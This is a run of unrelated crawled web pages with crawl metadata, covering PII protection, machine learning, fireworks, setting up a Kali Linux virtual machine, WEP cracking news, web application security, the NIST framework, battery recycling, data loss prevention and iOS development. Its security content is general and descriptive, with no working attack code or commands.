87% of the US population can be uniquely identified by a combination of gender, ZIP code, and date of birth. So even if the US legislation doesn’t consider quasi-identifiers as PII, the European legislation may. Example of a Personally Identifiable Information (PII) Breach Remember how Facebook fell victim to a major data breach back in 2018? Approximately 50 million Facebook user profiles were collected without Facebook‘s consent by an outside company called Cambridge Analytica. The outsider company got the data from the social media platform directly through a researcher who worked at the University of Cambridge, who built a personality quiz in the form of a Facebook app that was designed to take the information from those who volunteered to give access to their data for the quiz. However, not only did the app collect the quiz taker’s data, but it also collected the data of the friends and family members of the quiz takers. Facebook had a loophole in their system due to which over 50 million Facebook users had their data exposed to Cambridge Analytica without their consent. Even though Facebook banned the sale of their data, Cambridge Analytica turned around and sold the data to political consulting companies. Now, many other companies will continue looking for ways to harvest data, especially PII. But they should be met with more stringent regulations so that another debacle like Facebook‘s data breach isn’t repeated. How to Safeguard Your Personally Identifiable Information (PII) Let’s take a look at how you can secure PII against any loss or compromise by preventing a few preventive and corrective measures. Step 1: Identify Your PII and Find Where You Store It The first step is to know whether your company stores or uses PII. Government agencies can store PII like Social Security numbers, passport details, addresses, and license numbers. On the other hand, vendors can have bank details and login information. After identifying all the PII data your company has, you have to figure out where you store it. This can include file servers, cloud services, portals, employee laptops, and more. Consider the following: - Data in Use: The data your employees use to do the job, and that’s typically stored in a non-persistent digital state like RAM. - Data at Rest: The data stored or archived in locations like hard drives, databases, laptops, web servers, and SharePoint. - Data in Motion: The data which is transitioning from one location to another, such as data moving from a local storage device to a cloud server, or between two employees via email. You should consider all three data states to develop your PII protection plan. This will help you decide where the PII lives, how it’s used, and the different systems you need to protect. Step 2: Classify All Your PII Data Based on the Sensitivity Next, you have to create a data classification policy to sort your PII data in terms of sensitivity. Since it’s a crucial part of PII protection, you need to do this right. Consider the following factors to classify your PI data: - How unique is your data? If even a single record can identify an individual by itself, that data is highly sensitive. - Can you identify a unique individual by combining two or more pieces of data? - How many people can access your PII data and how frequently is your data transmitted over networks? - Is your data subject to any one of the following regulations: PCI DSS, GDPR, HIPAA, HITECH ACT (US), and the Criminal Justice and Immigration ACT (UK)? After weighing the above factors, you can classify your PII data based on sensitivity. At the very minimum, you should have three levels of data classification: - Restricted. This includes highly sensitive PII that could cause significant damage if it gets in the wrong hands. - Private. While not as sensitive as restricted data, private data can still cause a moderate level of damage to the company or individual if it gets compromised. - Public. Non-sensitive and low-risk data with little to no access restrictions. Data classification can guide your incident response team during a security breach by informing them about the level of information that was compromised. Be sure to delete any old or unnecessary PII to make it inaccessible to cybercriminals. Step 3: Devise an Acceptable Usage Policy (AUP) Not many people do this, but having an AUP can be very helpful to safeguard your sensitive assets. It should cover things like who can access PII and establish clear ground rules regarding an acceptable way to use PII. Your AUP can also serve as a starting place to build technology-based controls to enforce proper PII access and usage. Step 4: Encrypt Your PII and Remove Permission Errors You should always encrypt your PII at rest and in transit to enforce proper PII protection. We recommend using strong encryption and key management before you share PII over an untrusted network or upload it to the cloud. But, to do this, you’ll need the right set of technical controls. You can also automate the encryption process based on data classification to save time. Tracking your access control rights should be next on your list. You should implement and enforce the principle of least privilege when granting access to sensitive data. This will ensure that only those individuals have access to the PII data that need it to do their jobs. Step 5: Remove Internal Threats in the Form of Departing Employees Threats to your company’s data can be internal and external. Disgruntled departing employees are the most common internal threats. It’s why you should work on creating a standardized procedure for departing employees: - Delete all user accounts and access to the various enterprise systems to completely remove any access to your system. - Send a legal reminder about the legal responsibilities around PII and other sensitive data. - Share a copy of a signed confidentiality agreement that covers PII and sensitive data. Step 6: Educate Employees on the Importance of Protecting PII Educating employees on the importance of protecting PII is a straightforward and crucial step for PII protection. As your company’s AUP is a vital part of your employee education program, you should ensure every employee has a copy and signs a statement acknowledging that they agree to follow the policies laid out in the document. Another excellent tactic is to have an employee education policy on PII protection to instill a sense of ownership in employees, making them think they do indeed have an important role to play in PII protection. You should also make it easier for employees to report suspicious activity or behavior to management.
<urn:uuid:b771995e-c97d-4be4-9e49-2dcbdfb37dcc>
CC-MAIN-2022-40
https://nira.com/personally-identifiable-information/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00220.warc.gz
en
0.915652
2,435
2.6875
3
References to machine learning (ML) pop up in many contexts, often in connection with artificial intelligence (AI). What’s the difference between ML and AI? IBM data scientists have been developing Watson for many years, and they know a thing or two about both ML and AI. Here are the IBM definitions: Ready or not, we should expect both ML and AI to become a larger part of our lives. The terms AI and ML are often used interchangeably, but ML focuses more on training machines to learn on their own. If you search on “components of machine learning” or “machine learning models,” you’ll see many different answers. Fundamentally, an ML model looks at and learns from big data sources, variables and algorithms. Data can encompass structured and unstructured data – text, images, voice and so on. Variables are the items to be studied – histories of retail purchases, for example. An algorithm is a sequence of steps and instructions that a computer follows to calculate something, solve a problem or complete a task. A main goal of ML projects is to enable tasks to be automated, relieving humans of repetitive or time-consuming activities. ML is behind services such as business decision support, market research, dynamic retail pricing, automated banking, chatbots, virtual assistants and predictions. Cybersecurity companies, for example, rely on ML to help them predict which threats are more or less likely to lead to a security incident. In this use case, ML speeds up threat detection, prioritization and response. Like many technologies, ML has its own jargon. The following terms are a starting point – glossaries can run to 100 terms or more: According to research presented in a Software Strategies blog, enterprises are rapidly adopting ML: Data centers, whether on-premises or colocation, can use ML in areas such as architecture/design, power/cooling management and robotic inspection. Some colocation data centers offer customers the ability to interconnect with a variety of businesses that use AI/ML. Ready to dive more deeply into ML? Check out glossaries at Predictive Analytics World and Google. And, read Artificial Intelligence: The Types, Value and Applications, a blog focused on AI-driven learning at the data center, cloud and edge. The CoreSite Team Combining expertise, research and thought leadership to inform and advance hybrid IT.Read more from this author
<urn:uuid:19a0a170-9e9c-4268-aa1c-0c8feb843337>
CC-MAIN-2022-40
https://www.coresite.com/blog/what-is-machine-learning
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00220.warc.gz
en
0.940172
498
3.265625
3
Fireworks are one of the biggest parts of the Fourth of July. Most people plan their whole day around finding the best fireworks show in their area. While most people enjoy watching the dazzling and colorful explosions, they do not realize all of the science that goes into creating a fireworks show. The first firework was created by a Chinese monk who filled a piece of bamboo with gunpowder and threw it in a fire to create a bang that would scare the ghosts away. While most of today’s fireworks are more complex than that and are not typically used to scare ghosts, they are made in the same basic way, just using a little more technology. It was not until the Italian Renaissance that steel and charcoal were added to create orange and yellow colors in fireworks. Throughout the years, pyro-technicians have experimented with different metals to create all of the colors that are common in current firework shows. In order to get fireworks to fly as high as they do, technicians load the fireworks into a mortar, which is basically just a small cannon. They then light a fast-burning fuse that lights gunpowder that is stored in a separate bottom compartment of the firework, which sends it flying through the sky. The fireworks themselves are made up of different shells. The first is usually made of plastic or paper, which holds everything together. These shells are stuffed full of gunpowder, which has explosive spheres known as “stars” embedded. These stars are what become the points of light when the firework explodes. The different metals that the stars are coated with determine what color the firework is. Inside the firework is a time delay fuse, which is lit at the same time as the fast-burning fuse, which sends the firework flying, but it takes much longer to reach the gunpowder that is inside the firework. The length of the fuse determines how high the firework will be when it explodes. One of the down sides to these large explosions is that they are not easily caught on film, especially by smartphones. Luckily, there is new technology which helps you capture firework bursts. The app “LightBomber” gives your phone camera a long exposure, which will allow it to capture all the magic of the different fireworks. It also offers a “light trail” mode that will capture color bursts that look as real as seeing the fireworks in real life. D&D Security Resources would like to wish you and your family a fun and safe 4th of July, and encourage you to contact them for all of your security resource needs.
<urn:uuid:6260c920-0f0c-49ef-b308-e06d13347d33>
CC-MAIN-2022-40
https://ddsecurity.com/2014/07/02/technology-behind-fourth-of-july-fireworks/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00220.warc.gz
en
0.972385
528
2.75
3
What is Virtual Machine? Virtual Machine (VM) is a logical Machine inside computer works like physical machine (Real Computer) it is created by using Virtualization Software like VirtualBox and VMware. Virtualbox is best and free Software. We can create virtual machines for Windows, Linux, Mac and Other Operating Systems. When we create Virtual machine, it is similar as fresh computer (Without Operating System) It has most of Hardware devices virtually like hard drive, DVD writer, LAN card, etc. Is it amazing ??? Yes, Of course it is amazing because you are going to run a virtual computer inside your real computer. It means you can run multiple computers at same time. Like Window 8, Window 10, Kali Linux, Ubuntu, And more. If you are looking such type of interesting thing. Continue reading ….. Why did I choose to Create Virtual machine for Kali Linux? Kali Linux is a propelled Penetration Testing and Security Auditing Linux distribution. As you know that Kali Linux is a propelled Penetration Testing and Security Auditing Linux distribution. And you can use Live CD or flash drive of Kali Linux for Penetration Testing but Kali Linux updates time to time with new tools. So it is good for getting new tools first install Kali Linux on Virtual Box then updates & upgrades it time to time with its tools. Before installing Kali Linux you have to create Virtual Machine correctly inside Virtual Box or VMware. How to create Virtual machine for Kali Linux: If you are interested to learn new things like me then this tutorial useful for you. By the help of Virtual machines you can set up Virtual Lab inside a single Computer. First we are going to create a Virtual Attacker machine (Kali Linux). Virtual machines’s Requirements: Before start creates virtual Machine you need following requirement. Virtual Box should be installed on you system. If you dont’t know how to install Virtualbox on Windows, go Here Installing VirtualBox on Microsoft Windows 7 & 8 For creating virtual machine for Kali Linux, follow the steps. Step 1: Open the Virtual box Step 2: Click on the New. The new window will be pop up. In this window you will find three options for filling Name, type & version. Step3: Following things are to be filled: Name : Kali Linux Version: Debian 32 or 64 (according system architecture) Step 4: In the next window you need to set the virtual memory (RAM) of machine.1024 MB size [Is enough] for Kali Linux. So assign 1024 MB size for RAM. Click on the Next button. Step 5: In the next window you need to create a virtual hard drive. Select “Create a virtual hard drive Now” then click on the Create button. Step 6: Here you need to select file type of hard drive[where your hard drive will be saved]Select VMDK(Virtual Machine Disk) recommended because this supports to VMware . Then click on the next button Step 7: Select “dynamically allocation”. By this option you can resize hard drive, later as per your requirement click on next button you will reach on the next step. Step 8: There are two options in this window, first give the location of hard drive file where do you want to save the hard drive file . Then set the size of hard drive upto 20 GB[can be extended] for Kali Linux And click on Create button.
<urn:uuid:c59d4f11-8cb6-4b9d-9277-53d6d2bd81f2>
CC-MAIN-2022-40
https://www.cyberpratibha.com/blog/how-to-create-virtual-machine-for-kali-linux/?amp=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00220.warc.gz
en
0.806438
737
2.9375
3
15 years ago Many home internet users rely on an encryption system called Wireless Equivalent Protection (WEP) to stop others using their wi-fi link, even though WEP has long been known to be flawed. In early April three cryptographic researchers at the Darmstadt Technical University in Germany revealed a method of exploiting the flaws far more effectively. Before now it took at least 20 minutes of monitoring the airwaves before it was possible to break in to a wireless network protected by Now, armed with a program written by the researchers, it is possible to break in to the same network far faster. "Breaking in to a WEP protected network is now very easy to do," said Erik Tews, one of the researchers. "Doing it in 60 seconds is realistic, or five minutes in the very worst case. We think now that WEP is really dead and we recommend that no-one should use it." In its place he recommends an encryption system called Wi-fi Protected Access (WPA), introduced four years ago to replace WEP. "We have had a very close look at WPA and we can't find anything to exploit," he said.
<urn:uuid:bd3fb8af-b4de-4f29-baae-a252572a3f2c>
CC-MAIN-2022-40
https://forums.cabling-design.com/wireless/news-breaking-wep-in-minutes-or-even-seconds-45948-.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.959729
270
2.984375
3
PER CASO D’USO Web application security is the group of technologies, processes, and methods used to protect web applications, servers, and web services from a cyber attack. Web application security products and services use tools and practices such as multi-factor authentication (MFA), web application firewalls (WAFs), security policies, and identity validation to maintain user privacy and prevent intrusions. Explore additional web application security topics: Secure your apps with a zero-trust security solution Web application security is critical to protect data, customers, and systems from intrusions and data breaches that damage business continuity. Today, where there is an application for everything from remote working to banking, attackers find applications to be a prime target. Cybercriminals exploit vulnerabilities, such as design flaws, weaknesses in APIs, open-source code, or widgets, and they’re getting smarter and more organized. The safety of a business will ultimately depend on how quickly security teams can detect and fix security vulnerabilities in the development process. Therefore, it is critical to use application security tools that integrate into your application development environment. Attackers use a wide array of methods to target application vulnerabilities. Here are some of them: These are only some of the attack vectors cybercriminals use to target applications. With cybercrime on the rise, protecting applications from threats is crucial to limit the monetary and business impact. There are different approaches to web application security, depending on the vulnerabilities being addressed. For instance, web application firewalls (WAFs) are some of the most comprehensive tools. WAFs filter the traffic between the web application and any user that intends to access it. A WAF uses policies that help determine what traffic is safe and what isn’t, block malicious traffic attempts, and prevent attackers from reaching the application. WAFs also block the app from releasing unauthorized data. As DDoS (Distributed Denial of Service) attacks become more prevalent, organizations need to implement methods to protect their web applications from these attacks. Ransom DDoS attacks, in particular, are on the rise, where attackers ask for money to stop an ongoing attack or prevent an upcoming threat. The effects of a DDoS can be devastating, with the potential for huge revenue loss and serious business disruption. An effective DDoS mitigation service needs to not only filter and block suspicious traffic, but must also be intelligent enough to detect and allow legitimate traffic to pass. Another vector of attack to be aware of is malicious bots that are used to access web APIs and properties. Once the bot is inside the network it can take control, deploying code or making attacks such as DDoS and SQL injection. A bot management tool can detect and block malicious bot traffic, mitigating the risk of bot attacks. Application security testing (AST) is a method of making applications safer against security threats by identifying security vulnerabilities in source code. Originally, AST was a manual process, but the increasing complexity of enterprise software—with huge numbers of open source components prone to known vulnerabilities—made it necessary for AST to be automated. Most organizations combine different application security tools at different stages of the software development lifecycle. Application security testing can be categorized as static or dynamic, which address different security weaknesses. There are several tools and techniques: SAST tools inspect the static source code of an application, and report on any security weakness found. You can apply static testing tools to uncompiled code. It finds issues like syntax errors, math errors, and invalid or insecure references. DAST tools inspect the code while it’s running, detecting indicators of security vulnerabilities. For instance, issues with query strings, requests and responses, use of scripts, memory leaks, data injection, and more. You can use DAST tools to conduct scans simulating large numbers of malicious cases and record the application’s response. IAST tools combine SAST and DAST tools to improve the detection of security threats. IAST tools inspect the software during runtime, but it is run from the application server, so it can also inspect compiled sources. You can use IAST tools to learn about the root cause of vulnerabilities and which specific lines of code are involved, so it is easy to remediate them. In addition to automated application security testing, security analysts use manual penetration testing to simulate attacks against a running application. Pen testers use various tools to simulate the attacks, including DAST or SAST tools. Here are some tips and best practices that can help you protect your applications from cyberattacks: Encryption is essential as companies move to digital transformation. This is a simple step that doesn’t require complex web application security tools but is often overlooked by organizations. Attackers will take advantage of any unencrypted HTTP requests and mislead users. By encrypting the HTTPs, you make it safe to transfer data between users and servers, eliminating another potential attack vector. Traditionally, security professionals would use a vulnerability scanner and then manually conduct additional testing using security tools. However, this approach is now insufficient to face the volume and complexity of attacks. Current security tools integrate automation capabilities that prevent errors and issues early in the software development lifecycle, saving a lot of time and simplifying remediation. DDoS (distributed denial of service) attacks are a popular attack vector against applications. Attackers use malicious yet seemingly legitimate requests to consume and overload application resources. A web application security tester would take the steps to identify malicious behavior and prevent damage. DDoS protection services help detect and mitigate web application layer DDoS attacks by inspecting and diverting traffic. Secure code practices help developers make fewer errors when writing the code. They also help you detect and eliminate errors early in the software development lifecycle. Developers should understand how attackers exploit vulnerabilities and misconfiguration. Scanning for security vulnerabilities early in the software development life cycle (SDLC) helps detect and fix issues before attackers can exploit them. This is done using web application security tools. These tools integrate into the DevOps pipelines and inform developers of vulnerabilities as soon they commit new code to the repository. Citrix Web App and API Protection are offered now as a cloud service. The all-in-one platform delivers holistic and layered protection against known and zero-day attacks. It includes an integrated web application firewall (WAF), bot management, and DDoS mitigation service. The more disparate applications you deploy, the higher the risk of a fragmented security posture. The Citrix platform offers consistent security across the entire app ecosystem and environments.
<urn:uuid:7a88344a-a9cd-4e55-8d2b-01332cf69da4>
CC-MAIN-2022-40
https://www.citrix.com/it-it/solutions/app-delivery-and-security/what-is-web-application-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.914802
1,339
2.78125
3
InformationWeek reports that researchers at last week’s IEEE SmartGridComm2010 conference estimate that by 2015, the smart grid will offer up to 440 million potential points to be hacked. Why mess with someone’s home electricity meter? Le Xie, an assistant professor of electrical and computer engineering at Texas A&M University, says it could provide attackers with the means to benefit financially. The article explains: Utilities typically plan their energy requirements one day in advance. An attacker who manipulated apparent energy demands, forcing utilities to turn to emergency — and more expensive — energy resources could likewise place safe bets in the energy market. Gambling against the price difference between the day-ahead market and the real-time market could be a real payoff. Attackers also may want to cause chaos by taking out sensitive facilities or using usage patterns to determine when a consumer is on vacation and then burgling their house. Another issue is that today’s smart grid systems could have a life span of 10 or 20 years. With such a long life span, their built-in security will become widely known and disseminated. As the article notes: Today’s new smart grid meter could be 2030’s cyber-catastrophe, or at least give rise to some new variation on Stuxnet. As a starting point to protecting the smart grid, the National Institute of Standards and Technology has released a list of 189 security requirements to build a safe, secure and reliable smart grid.
<urn:uuid:0244bc48-e74c-4cf0-82bd-f81befc818fa>
CC-MAIN-2022-40
https://www.enterprisenetworkingplanet.com/security/researchers-warn-of-smart-grid-cyber-attack-opportunities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00420.warc.gz
en
0.941956
305
2.78125
3
Using a cybersecurity framework is absolutely a best practice. Experience has led the cybersecurity community to think of defense in terms of process. Over time and through extensive coordination the best of these processes have made their way into standards and guidance documents and corporate policies. Every firm is different so rather than borrow someone else’s policy you can start with an outline or framework of an approach. Our preferred framework for small to medium businesses is the one coordinated by the National Institute of Standards and Technology (NIST), called the “Framework for Improving Critical Infrastructure Cybersecurity”, or frequently just called the NIST Cybersecurity Framework. We like the NIST framework because it is easy to remember, and the terms it introduces help reduce ambiguity when communicating in companies and also when communicating between companies. It is both a framework for building an action plan and it is a common taxonomy that can enhance your ability to communicate on cybersecurity topics with your suppliers, government and business clients. We also like the framework because it is built on an understanding of risk management processes. Most cyber security decisions in small to medium sized businesses should be informed by topics such as risk tolerance and impact on business processes. This framework supports that. The core of the NIST Cybersecurity framework is built around five core process categories: Understand and Identify: Organizations need to understand and identify cyber risks to business, assets which need to be protected, as well as resources required to operate. You must know yourself and know the threat. It is also important to know best practices in defense. Protect: Developing appropriate safeguards that can mitigate the impact of a breach of compromise of employee information or damage to your online presence are key. This is the meat of your plan. A good cyber defense will protect the right things and ensure if there is a breach that its impact is mitigated. Detect: Current operations in defense of networks and a study of the history of cyber crime leads to the unfortunate conclusion that the bad guys will continue to breach networks and gain unauthorized access to information. When the right protections are in place their actions can be contained. Putting the right tools and processes in place to detect issues are also key to taking the right action. Respond: When a cyber event occurs the processes should be in place to enable a rapid response. Response will depend on the nature of the incident, but could include notification of clients, partners, suppliers, law enforcement and others. It could also include bringing in outside help to push the adversaries out and improve defenses. Recover: Planning for recovery can help return your business to normal operations as fast as possible. Do you have other tips we should know about? Please contact us here and let us know what we should know.
<urn:uuid:cb74a837-7678-4714-b152-8cd5122126ac>
CC-MAIN-2022-40
https://crucialpointllc.com/leveraging-the-nist-cybersecurity-framework-to-economically-reduce-cyber-threats/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00420.warc.gz
en
0.95139
556
2.578125
3
October 28, 2020 Impacts of this waste are widely understood, with rotting items contributing to greenhouse gas emissions, general pollution, and microplastics littering our waterways and infiltrating the food chain. What many don’t seem to understand, however, is the economic impact of waste. Thanks to continuous innovation, upgrades and a human need to be in front of the trends, the product lifecycle is getting shorter from electronic devices to clothes. As a result, mountains of obsolete, discarded items are being created that can take hundreds of years – and in the case of plastics, thousands – before they begin to break down. In 2019 alone, 2.01 billion metric tons of waste was generated, and if we continue at the same rate, that figure will increase to 3.40 billion metric tons – an increase of 70 percent – by 2050. The environmental impacts of this waste are widely understood, with rotting items contributing to greenhouse gas emissions, general pollution, and microplastics littering our waterways and infiltrating the food chain. What many don’t seem to understand, however, is the economic impact of waste. With environmentalist pleas mainly focusing on the negative environmental impacts of pollution, the economic impacts like the waste of raw materials and the cost of energy that goes into manufacturing these kinds of products often go under the radar. With this in mind, it’s clear that the world’s carefree attitude towards waste is not sustainable, but what exactly is the solution? As it stands, the world operates on a linear economic model, where primary providers supply manufacturing companies with virgin materials to create their products. These products are created, sent to stores, purchased by the consumer, used and then thrown away, with the bulk of these valuable materials ending up in landfills, never to be used again. The redesign of this economic model is where the solution lies, and one economic model that is quickly gaining traction for its viability in the scientific, economic, and environmentalist communities is the concept of a closed loop, or circular economy. According to The Ellen MacArthur Foundation, a closed loop economy is an industrial system that is restorative or regenerative by intention and design. This means that every product, material, or resource within the economy is maintained, or in use, for as long as possible in an effort to minimize the amount of waste generated. Three principles guide this approach, the first is to design out waste and pollution, the second is to keep products and materials in use for as long as possible, and the third is the aim to regenerate natural systems. A great example of the circular economy in action can be found in the lithium-ion (li-ion) battery industry, where a number of technologies are emerging to provide a circular pathway for li-ion batteries at the end of their life. Through this process, end-of life batteries are sent to resource recovery faciltiies where, through a process of shredding and wet chemistry, 80 to 100 percent of resources are recycled back into raw materials that can be used to manufacture new batteries or returned to other parts of the economy. These materials are of the same quality as virigin materials, thus enabling a similar product to be manufacutred that could possibly be recycled again in the future. This process reduces both the amount of electronic waste that goes to landfill and the amount of energy required to generate new batteries components from virgin materials, while also preserving finite natural resources like cobalt and lithium. The numbers back up these reductions too, with a Life Cycle Assessment (LCA) study by Li-Cycle reporting that through resource recovery, GHG emissions per one tonne of battery materials produced by their operations in Ontario are 74.14 percent lower compared to sourcing these materials from mining and refining. In addition to this, reductions in the volume of water used across all stages of production was significant across the board. While li-ion batteries are just one example of how a closed loop economy can provide immense benefits in terms of both environmental impact and energy savings, the benefits of such an economy can be found when implemented in almost every industry sector. Some beer businesses like Sierra Nevada, for example, have made steps toward closing the loop in the company’s California facility, where beermakers are composting waste generated from the brewery into soil used to grow barley and hops. For Days, a subscription-based clothing brand provides customers with a bundle of clothes that when well-worn and stained, are sent back to the company for a new set of clothes, made directly from those used threads. Apple has also made steps towards building a closed loop, announcing plans to transition to 100 percent recycled products. Furthermore, they have started a ‘take back’ program where customers can trade in their old phones and computers to strip and remake the components into new products. If adopted on a large-scale, this closed loop economy can offer benefits that stretch further than cost savings and a healthier climate and environment. A closed loop initiative shows potential to create new jobs and curb human exploitation through new industries dedicated to processing recovered resources. While making the shift to a closed-loop economy will undoubtedly have some growing pains during the transition, to reap the myriad of benefits the long-term shift must begin now rather than later. About Ajay Kochhar Ajay Kochhar is the Co-Founder, President and CEO at Li-Cycle, an advanced lithium-ion battery resource recovery company. Li-Cycle Technology is a closed loop, economically viable, safe, sustainable and scalable processing technology that provides a solution to the global lithium-ion battery recycling problem.
<urn:uuid:9c80140c-790f-45bb-a39d-9e5af9c7280d>
CC-MAIN-2022-40
https://internetofbusiness.com/is-recycling-the-new-manufacturing-how-companies-who-take-a-green-circular-approach-are-saving-money-and-the-environment/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00420.warc.gz
en
0.951579
1,147
3.765625
4
Data loss prevention What is data loss prevention? Data loss prevention (DLP) involves systematically identifying, locating, and assessing data and user activities with content-and-context awareness to apply policies or proactive responses to prevent data loss. Data at rest, in use, and in motion must be under constant surveillance to spot deviations in the way enterprise data is stored, used, or shared. This includes analyzing data streams across endpoints, data shared with business associates, and data in the cloud. Why is data loss prevention important? Data loss prevention has grown beyond legacy systems of only physical and software controls for data protection. DLP is an integrated approach to identifying data that is most vulnerable and responding to threats to its security and integrity. The major reasons for deploying DLP are: Blocking data breaches 3,932 breaches were publicly reported in 2020 according to Risk Based Security. Given the staggering rise in data breaches, it's essential to invest in trustworthy tools to help prevent incidents that would disrupt business. Detecting insider activity Data can be exposed by malicious insiders who stand to gain something from doing so, but unsuspecting users can also accidentally leak data due to negligence. Monitoring for signs of leaks is important to quickly spot and confine the impact of data loss. Securing sensitive data It's critical to locate and secure all personally Identifiable Information (PII), health records, and card payment information in your data stores. The strategic combination of data discovery, real-time change detection, and rapid incident response provided by DLP tools helps promptly identify an attack and thwart data exfiltration. Complying with data regulations PCI DSS, the GDPR, and other data privacy regulations require organizations to deploy data loss prevention software to protect sensitive data from accidental loss, destruction, or damage. How does data loss prevention work? Data loss prevention involves the following processes to effectively secure and prevent data loss: Identifying and classifying data It's important to identify instances of sensitive data in an organization to ensure it's being handled safely. For example, data in use, in motion, or at rest can contain PII; if this data falls into the wrong hands, the resulting breach or data theft can be fatal to a business. A data classification tool can help not only with locating data but also classifying it according to the level of confidentiality and security required. Data laws like the GDPR, HIPAA, PCI DSS, and others specify how data should be stored, treated, processed, and handled to prevent data thefts or breaches. Adhering to these laws not only helps secure data and prevent hefty violation fines, but also creates trust among customers. Monitoring data movements File access events have to be monitored in real time to detect ransomware attacks, insider threats, and other cyberthreats. File system auditing software can track file creation, deletion, modification, or security permission changes. It can also instantly spot unauthorized changes and unusual file activities indicative of cyberattacks, enabling IT teams to roll out remedial measures as soon as an attack is detected. Unauthorized data transfers can be caused by privilege escalation or undue access to files. A file analysis tool comes in handy to identify permission inconsistencies and files with open or full access to rectify them. Ensure that the principle of least privileges (POLP) is followed to grant users only the rights needed to fulfill their job roles. Detecting and preventing data leaks Control what goes out of user devices, removable storage media, and other file sharing channels. Stringent policies regarding data access and transfer are necessary to ensure that data only reaches the right hands. Secure data by enabling multi-factor authentication (MFA), as it lowers the chances of user accounts from being hacked easily.A data loss prevention tool can help monitor files that are actively used and shared in your organization. For monitoring the cloud, cloud protection software can be used to analyze and block unauthorized web access over the internet. Besides monitoring data movement, strengthen authorized data movements at the periphery using firewalls and antivirus applications. As a last security measure, data encryption can be used to defend against eavesdropping. How DataSecurity Plus helps prevent data leaks DataSecurity Plus is ManageEngine's unified DLP platform that offers the essentials needed to monitor and secure your data stores. It combines data visibility and security features to enable content-and-context-aware DLP. |Locating and classifying data|| PII scanning to pinpoint personally identifiable information like email addresses, phone numbers, etc. Data classification to automate file tagging to sort files as Public, Internal, Sensitive, or Restricted. Permission analysis to find permission inconsistencies that insiders or hackers can misuse for unauthorized data transfers. Data risk assessment to identify data privacy violations, locate the source, and rectify it. |Monitoring data movements|| File activity monitoring for real-time reports on changes to file repositories. File integrity monitoring to ensure that data is safe from unauthorized changes, and to spot ransomware attacks indicated by excessive file renames or deletions. |Detecting data leaks|| Insider threat monitoring to prevent unauthorized transfers of business data out of the organization. File copy monitoring for tracking files copied by users to other network locations or removable storage devices. USB activity monitoring to control or block removable storage devices and peripheral devices. Cloud application discovery for monitoring web traffic from endpoints and managing file uploads. Schedule a personalized demo or try all of these features in a fully functional, 30-day trial.
<urn:uuid:eaf1b521-6647-41a9-a893-0775b6b9fe33>
CC-MAIN-2022-40
https://www.manageengine.com/data-security/what-is/data-loss-prevention.html?source=what-is
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00420.warc.gz
en
0.897837
1,160
2.984375
3
iOS app development iOS app development What is iOS app development? iOS application development is the process of making mobile applications for Apple hardware, including iPhone, iPad and iPod Touch. The software is written in the Swift programming language or Objective-C and then deployed to the App Store for users to download. If you’re a mobile app developer, you may have had reservations about iOS development. For example, each developer needs a Mac computer—and Macs are generally more expensive than their Windows-based counterparts. In addition, once you complete your app, it faces a stringent quality review process before it can be distributed through the App Store. Nevertheless, if your organization’s employees, customers or partners are among the hundreds of millions of Apple iPhone and iPad users around the world, you have obvious reasons to engage in iOS app development. And despite potentially high barriers to entry, developing an iOS app can be as easy as (in some cases easier than) developing for Android. With proper planning and the right resources, you can join the ranks of iOS app developers. Are you ready to try your hand at iOS mobile app development? IBM offers an easy-to-follow, hands-on tutorial for building an iOS app with cloud-based push notifications and performance monitoring. Meet the developer requirements Before you write a single line of code in the iOS app development process, you need: - An Apple Mac computer running the latest version of macOS. - Xcode, which is the integrated development environment (IDE) for macOS, available as a free download from the Mac App Store. - An active Apple Developer account, which requires a $99 annual fee. These three requirements work together: Only active members of the Apple Developer Program can post an app to the Apple App Store. Only apps signed and published by Xcode are eligible for submission to the App Store. Xcode runs only on macOS, and macOS runs only on Apple computers. The good news is that Xcode offers much more than just the ability to sign and publish your completed app. The IDE contains a user interface designer, code editor, testing engine, asset catalogue and more—virtually everything you need for iOS app development. Select an iOS programing language There are currently two programming languages for iOS app development. - Objective-C: Developed in the early 1980s, Objective-C was the primary programming language for all Apple products for decades. Derived from the C language, Objective-C is an object-oriented programming language centered on passing messages to different processes (as opposed to invoking a process in traditional C programming). Many developers choose to maintain their legacy applications written in Objective-C instead of integrating them into the Swift framework, which was introduced in 2014. - Swift: The Swift programming language is the new “official” language of iOS. While it has many similarities to Objective-C, Swift is designed to use a simpler syntax and is more focused on security than its predecessor. Because it shares a run time with Objective-C, you can easily incorporate legacy code into updated apps. Swift is easy to learn, even for people just beginning to program. Because Swift is faster, more secure and easier to use than Objective-C, you should plan to use it to develop your iOS app unless you have a compelling reason to stick with Objective-C. Tap into APIs and libraries One of the major advantages of iOS app development is the extensive collection of developer resources available to you. Because of the standardization, functionality and consistency of iOS app development, Apple is able to release native APIs and libraries as kits that are stable, feature-rich and easy to use. You can use these iOS SDKs to seamlessly integrate your app into Apple’s existing infrastructure. For example, if you’re working on an app controller for a smart toaster oven, you can use HomeKit to standardize the communication between the toaster and the phone. Users will be able to coordinate communication between their smart toaster oven and their smart coffee maker. There are kits for game development (such as SpriteKit, GameplayKit and ReplayKit), health apps, maps, cameras, as well as Siri, Apple’s virtual assistant. These extensive kits allow you to take advantage of the features built into iOS and integrate third-party apps with ease, creating apps that connect to social media, use the camera or native calendar app, or automatically record replay videos of an especially thrilling gameplay moment. Expand into the cloud iPhones are powerful devices. But to handle resource-intensive tasks, consider offloading 